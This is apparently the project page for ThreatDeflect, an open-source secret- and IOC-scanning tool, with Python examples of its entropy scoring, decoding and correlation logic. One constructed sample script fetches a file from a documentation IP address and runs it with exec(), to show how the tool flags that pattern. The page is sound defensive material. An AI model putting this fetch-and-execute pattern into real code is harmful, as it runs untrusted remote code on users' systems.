Open Source Threat Analysis Engine

Secret detection, IOC extraction, and supply chain attack identification. From reconnaissance to report, fully automated.

Rust + Python | GPL-3.0 | crates.io | GUI + CLI

// Features

> Detection Engine

46 regex-based rules covering AWS keys, GitHub tokens, database credentials, reverse shells, crypto mining, and supply chain patterns.

> Confidence Scoring

Shannon entropy, file context classification, assignment detection, and placeholder filtering. Each finding receives a score from 0.0 to 1.0 that decides how it is routed.
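As an added illustration of the scoring idea (example code written for this page, not ThreatDeflect's own engine; the rule regex, the placeholder markers, the 0.7/0.3 weighting and the routing thresholds are all assumptions), the following scores assigned values by entropy, down-weights files under test or fixture directories, and drops documentation placeholders before they can be reported:

```python
import math
import re

# Hypothetical rule (not the project's): a value of at least 8 characters
# assigned to a name that looks secret-bearing.
ASSIGNED_SECRET = re.compile(
    r'(?P<name>\w*(?:secret|token|key|password)\w*)\s*[:=]\s*'
    r'["\'](?P<value>[^"\']{8,})["\']',
    re.IGNORECASE,
)

# Substrings that mark documentation or template values rather than real secrets.
PLACEHOLDER_MARKERS = ("example", "changeme", "placeholder", "your_", "xxxx", "dummy", "${", "<")

# Path segments that indicate test or sample material; findings there are down-weighted.
LOW_TRUST_SEGMENTS = {"test", "tests", "fixtures", "example", "examples", "docs"}


def shannon_entropy(value: str) -> float:
    """Bits per character; about 4.0 is what random base64 or hex looks like."""
    if not value:
        return 0.0
    n = len(value)
    counts = {}
    for ch in value:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_placeholder(value: str) -> bool:
    lowered = value.lower()
    return any(marker in lowered for marker in PLACEHOLDER_MARKERS)


def file_context_weight(path: str) -> float:
    """Scale factor from where the file sits in the tree (assumed weights)."""
    segments = path.lower().split("/")
    if any(seg in LOW_TRUST_SEGMENTS for seg in segments):
        return 0.5
    return 1.0


def score_candidate(value: str, assigned: bool, path: str) -> float:
    """Confidence in [0.0, 1.0]: entropy term plus an assignment bonus, scaled by context."""
    if is_placeholder(value):
        return 0.0
    entropy_term = min(shannon_entropy(value) / 4.0, 1.0)
    raw = 0.7 * entropy_term + (0.3 if assigned else 0.0)
    return round(min(raw * file_context_weight(path), 1.0), 2)


def route(score: float) -> str:
    """Thresholds are assumptions for this example: report, send for review, or drop."""
    if score >= 0.7:
        return "report"
    if score >= 0.4:
        return "review"
    return "discard"


def scan(content: str, path: str) -> list:
    """Find assigned candidates and attach a score and a route to each."""
    findings = []
    for m in ASSIGNED_SECRET.finditer(content):
        s = score_candidate(m.group("value"), assigned=True, path=path)
        findings.append({"name": m.group("name"), "score": s, "route": route(s)})
    return findings


# Constructed sample file; the AKIA... value is the well-known AWS documentation key.
SAMPLE_CONFIG = '''
api_key = "AKIAIOSFODNN7EXAMPLE"
db_password = "q7Zp2LmX9vKd4RtB"
session_secret = "aaaaaaaaaaaaaaaa"
'''

if __name__ == "__main__":
    for finding in scan(SAMPLE_CONFIG, "src/config.py"):
        print(finding)
```

Run against the sample, the documentation key is discarded as a placeholder, the 16-distinct-character password scores 1.0 and is reported, and the repeated-character value scores only the assignment bonus; the same password in a `tests/fixtures/` path drops to 0.5 and is routed for review instead.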

> Obfuscation Detection

Automatically decodes Base64, hex, URL-encoded, and character array obfuscated secrets and IOCs.
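The following is an added example of layered decoding feeding IOC extraction (written for this page, not ThreatDeflect's decoder; the token regexes, the printable-ASCII acceptance test and the depth limit are assumptions). It builds a constructed input from the standard library encoders, using documentation IP ranges, so the obfuscated literals are guaranteed well-formed, then peels Base64, hex, URL-encoding and character arrays, including one layer nested inside another:

```python
import base64
import re
import string
from urllib.parse import quote, unquote

# IOC patterns kept deliberately simple: IPv4 addresses and http(s) URLs.
IPV4 = re.compile(r'\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b')
URL = re.compile(r'https?://[^\s"\'<>)\]]+')

# Candidate encoded tokens, one pattern per supported obfuscation layer (assumed thresholds).
B64_TOKEN = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')
HEX_TOKEN = re.compile(r'(?<![0-9A-Fa-f])(?:[0-9A-Fa-f]{2}){8,}(?![0-9A-Fa-f])')
CHAR_ARRAY = re.compile(r'\[\s*\d{1,3}(?:\s*,\s*\d{1,3}){7,}\s*\]')
URL_ENCODED = re.compile(r'(?:%[0-9A-Fa-f]{2}){2,}')


def _as_text(data: bytes):
    """Accept a decode only if it yields printable ASCII; otherwise it was noise."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and all(ch in string.printable for ch in text) else None


def decode_once(text: str) -> list:
    """Return every plausible decoding of the encoded tokens found in `text`."""
    found = []
    for m in B64_TOKEN.finditer(text):
        token = m.group(0)
        token += "=" * (-len(token) % 4)  # tolerate stripped padding
        try:
            decoded = _as_text(base64.b64decode(token, validate=True))
        except ValueError:
            decoded = None
        if decoded:
            found.append(decoded)
    for m in HEX_TOKEN.finditer(text):
        decoded = _as_text(bytes.fromhex(m.group(0)))
        if decoded:
            found.append(decoded)
    for m in CHAR_ARRAY.finditer(text):
        codes = [int(n) for n in re.findall(r'\d+', m.group(0))]
        if all(32 <= c < 127 for c in codes):
            found.append("".join(chr(c) for c in codes))
    if URL_ENCODED.search(text):
        found.append(unquote(text))
    return found


def decode_layers(text: str, max_depth: int = 4) -> list:
    """Breadth-first decoding; a decoded layer may itself contain encoded tokens."""
    seen = {text}
    frontier, layers = [text], []
    for _ in range(max_depth):
        next_frontier = []
        for layer in frontier:
            for decoded in decode_once(layer):
                if decoded not in seen:
                    seen.add(decoded)
                    layers.append(decoded)
                    next_frontier.append(decoded)
        frontier = next_frontier
        if not frontier:
            break
    return layers


def extract_iocs(text: str) -> dict:
    """IOCs from the raw text and from every decoded layer, de-duplicated and sorted."""
    ips, urls = set(), set()
    for layer in [text] + decode_layers(text):
        ips.update(IPV4.findall(layer))
        urls.update(URL.findall(layer))
    return {"ipv4": sorted(ips), "url": sorted(urls)}


def build_sample() -> str:
    """Constructed input using TEST-NET documentation addresses, built with the
    standard encoders so the obfuscated literals are guaranteed well-formed."""
    b64_url = base64.b64encode(b"http://203.0.113.10/update.txt").decode()
    hex_ip = b"198.51.100.7".hex()
    char_array = "[" + ", ".join(str(ord(c)) for c in "https://203.0.113.55/cfg") + "]"
    url_enc = quote("https://198.51.100.9/stage", safe="")
    nested = base64.b64encode(b"ip=" + b"192.0.2.44".hex().encode()).decode()  # base64 over hex
    return "\n".join([
        f'a = "{b64_url}"',
        f'b = "{hex_ip}"',
        f'c = {char_array}',
        f'd = "{url_enc}"',
        f'e = "{nested}"',
    ])


SAMPLE = build_sample()

if __name__ == "__main__":
    print(extract_iocs(SAMPLE))
```

None of the five addresses is visible to a plain regex over the raw text; all of them, including the one hidden two layers deep, surface once the decoded layers are scanned. The printable-ASCII check is what keeps hex literals from being accepted as bogus Base64 decodes.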

> Cross-Evidence Correlation

Correlates findings within the same file: code that fetches an external payload and executes it is reported as a single HIGH severity alert instead of two weaker ones.
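To show how rule-based detection and cross-evidence correlation fit together (covering both the Detection Engine and this feature), here is an added example written for this page rather than ThreatDeflect's own rule set: a small rule table with severities, per-line matching, and a correlation step that collapses a network fetch plus a dynamic execution call in one file into a single HIGH finding. The rule ids, severities, patterns and the constructed sample script (with a made-up AKIA-format key) are all assumptions.

```python
import re
from collections import defaultdict

# Hypothetical rule table, not the project's: (rule id, severity, pattern).
RULES = [
    ("aws_access_key_id", "HIGH",   re.compile(r'\bAKIA[0-9A-Z]{16}\b')),
    ("github_pat",        "HIGH",   re.compile(r'\bghp_[A-Za-z0-9]{36}\b')),
    ("network_fetch",     "LOW",    re.compile(r'\b(?:requests\.get|urllib\.request\.urlopen|urlopen)\s*\(')),
    ("dynamic_exec",      "MEDIUM", re.compile(r'\b(?:exec|eval)\s*\(')),
]

# Cross-evidence rules: when every listed rule fires in one file, emit one merged finding
# and suppress the components it was built from.
CORRELATIONS = [
    ({"network_fetch", "dynamic_exec"}, "fetch_and_execute", "HIGH"),
]


def detect(content: str, path: str) -> list:
    """Per-line rule matching; returns one finding per rule hit."""
    findings = []
    for lineno, line in enumerate(content.splitlines(), start=1):
        for rule_id, severity, pattern in RULES:
            if pattern.search(line):
                findings.append({"rule": rule_id, "severity": severity, "path": path, "line": lineno})
    return findings


def correlate(findings: list) -> list:
    """Merge component findings that together form a stronger pattern in the same file."""
    by_path = defaultdict(list)
    for f in findings:
        by_path[f["path"]].append(f)
    merged = []
    for path, file_findings in by_path.items():
        present = {f["rule"] for f in file_findings}
        consumed = set()
        for components, merged_rule, severity in CORRELATIONS:
            if components <= present:
                lines = sorted(f["line"] for f in file_findings if f["rule"] in components)
                merged.append({"rule": merged_rule, "severity": severity, "path": path, "lines": lines})
                consumed |= components
        merged.extend(f for f in file_findings if f["rule"] not in consumed)
    return merged


# Constructed sample: a hard-coded key (made-up value in AKIA format) and a
# fetch-then-execute pair, the pattern the correlation rule is meant to catch.
SAMPLE_SCRIPT = '''import requests
AWS_KEY = "AKIAQ2R7X9P0L4M8N6T1"
update = requests.get("http://203.0.113.10/update.py")
exec(update.text)
'''

if __name__ == "__main__":
    for finding in correlate(detect(SAMPLE_SCRIPT, "tools/update.py")):
        print(finding)
```

Detection alone yields three findings (HIGH, LOW, MEDIUM); after correlation the LOW and MEDIUM components are replaced by one HIGH `fetch_and_execute` finding that records both source lines, so a reviewer sees the behaviour rather than two unrelated pattern hits.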

> Threat Intel APIs

Integrates with VirusTotal, Shodan, AbuseIPDB, URLHaus, MalwareBazaar. All integrations are optional; the tool works fully offline.

> Local AI Analysis

Summarize findings with Ollama. No data leaves your machine. Supports any local model.

// Quick Start

Rust Crate

```shell
cargo add threatdeflect-core
```

```rust
use threatdeflect_core::SecretAnalyzer;

// `rules` (the detection rule set) and `content` (the file text) are
// loaded by the caller; that step is not shown here. The `?` operator
// requires the enclosing function to return a Result.
let analyzer = SecretAnalyzer::new(rules, vec![])?;
let result = analyzer.analyze_content(
    content, "src/config.py", "config.py"
);
```
CLI Tool

```shell
# Install
pip install threatdeflect

# Scan a repository
threatdeflect repo https://github.com/org/repo

# Analyze IOCs
threatdeflect ioc 8.8.8.8 https://suspicious.com

# With AI summary
threatdeflect repo https://github.com/org/repo --ai llama3
```

// Architecture

ThreatDeflect
  GUI (Tkinter) | CLI (Typer)
  Python Engine: correlation, AI, threat intel APIs
  Rust Core (PyO3): regex, entropy, decoding (published as threatdeflect-core on crates.io)